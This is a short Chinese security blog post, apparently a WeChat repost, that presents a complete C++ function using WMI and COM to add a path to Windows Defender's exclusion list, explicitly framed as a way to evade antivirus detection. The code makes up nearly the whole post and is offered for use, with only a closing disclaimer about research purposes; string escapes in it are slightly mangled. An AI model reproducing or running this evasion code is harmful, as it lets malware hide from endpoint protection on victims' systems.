先知上曾经有人发过一篇利用windows defender排除项来免杀的文章,文章地址:
https://xz.aliyun.com/t/10317
而这个过程我们也可以使用代码来进行实现
INT AddDefenderExclussion(WCHAR* exclpath){/*WCHAR path[] = L"C:\Temp";INT res = AddDefenderExclussion(path);if (!res){::wprintf(L"[-] AddDefenderExclussion has failedn");}*/HRESULT hr;hr = CoInitializeEx(0, COINIT_MULTITHREADED);if (FAILED(hr)){::wprintf(L"[-] CoInitializeEx has failedn");return 0;}hr = CoInitializeSecurity(NULL,-1,NULL,NULL,RPC_C_AUTHN_LEVEL_DEFAULT,RPC_C_IMP_LEVEL_IMPERSONATE,NULL,EOAC_NONE,NULL);if (FAILED(hr)){::wprintf(L"[-] CoInitializeSecurity has failedn");CoUninitialize();return 0;}IWbemLocator* pLoc = 0;hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);if (FAILED(hr)){::wprintf(L"[-] CoCreateInstance has failedn");CoUninitialize();return 0;}IWbemServices* pSvc = 0;hr = pLoc->ConnectServer(BSTR(L"ROOT\Microsoft\Windows\Defender"), NULL, NULL, 0, NULL, 0, 0, &pSvc);if (FAILED(hr)){::wprintf(L"[-] ConnectServer has failedn");pLoc->Release();CoUninitialize();return 0;}hr = CoSetProxyBlanket(pSvc,RPC_C_AUTHN_WINNT,RPC_C_AUTHZ_NONE,NULL,RPC_C_AUTHN_LEVEL_CALL,RPC_C_IMP_LEVEL_IMPERSONATE,NULL,EOAC_NONE);if (FAILED(hr)){::wprintf(L"[-] CoSetProxyBlanket has failedn");pSvc->Release();pLoc->Release();CoUninitialize();return 0;}IWbemClassObject* pClass = 0;BSTR Clname = BSTR(L"MSFT_MpPreference");hr = pSvc->GetObject(Clname, 0, NULL, &pClass, NULL);BSTR MethodName = BSTR(L"Add");IWbemClassObject* pInSignature = 0;hr = pClass->GetMethod(MethodName, 0, &pInSignature, NULL);if (FAILED(hr)){::wprintf(L"[-] GetMethod has failedn");pInSignature->Release();pClass->Release();pSvc->Release();pLoc->Release();CoUninitialize();return 0;}IWbemClassObject* pClassInstance = NULL;hr = pInSignature->SpawnInstance(0, &pClassInstance);if (FAILED(hr)){::wprintf(L"[-] SpawnInstance has failedn");pClassInstance->Release();pInSignature->Release();pClass->Release();pSvc->Release();pLoc->Release();CoUninitialize();return 0;}// Create an arraySAFEARRAYBOUND rgsaBounds[1];rgsaBounds[0].cElements = 1;rgsaBounds[0].lLbound = 0;SAFEARRAY* psaStrings;psaStrings = SafeArrayCreate(VT_BSTR, 1, rgsaBounds);// Add a string to the arrayVARIANT vString;VariantInit(&vString);V_VT(&vString) = VT_BSTR;V_BSTR(&vString) = _bstr_t(exclpath);LONG lArrayIndex = 0;SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString));VariantClear(&vString);// variant arrayVARIANT vStringList;VariantInit(&vStringList);V_VT(&vStringList) = VT_ARRAY | VT_BSTR;V_ARRAY(&vStringList) = psaStrings;// Store the value for the in parametershr = pClassInstance->Put(L"ExclusionPath", 0, &vStringList, CIM_STRING|CIM_FLAG_ARRAY);if (FAILED(hr)){::wprintf(L"[-] Put has failed %xn", hr);VariantClear(&vStringList);pClassInstance->Release();pInSignature->Release();pClass->Release();pSvc->Release();pLoc->Release();CoUninitialize();return 0;}IWbemClassObject* pOutParams = NULL;hr = pSvc->ExecMethod(Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL);if (FAILED(hr)){::wprintf(L"[-] ExecMethod has failed %xn", hr);VariantClear(&vStringList);pClassInstance->Release();pInSignature->Release();pClass->Release();pSvc->Release();pLoc->Release();CoUninitialize();return 0;}VariantClear(&vStringList);pClassInstance->Release();pInSignature->Release();pClass->Release();pLoc->Release();pSvc->Release();CoUninitialize();return 1;}
代码来自:https://stmxcsr.com/micro/
除此之外,网站还有很多其他的功能实现,推荐阅读使用。
原文始发于微信公众号(鸿鹄实验室):利用 WMI and COM 绕过windows defender
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论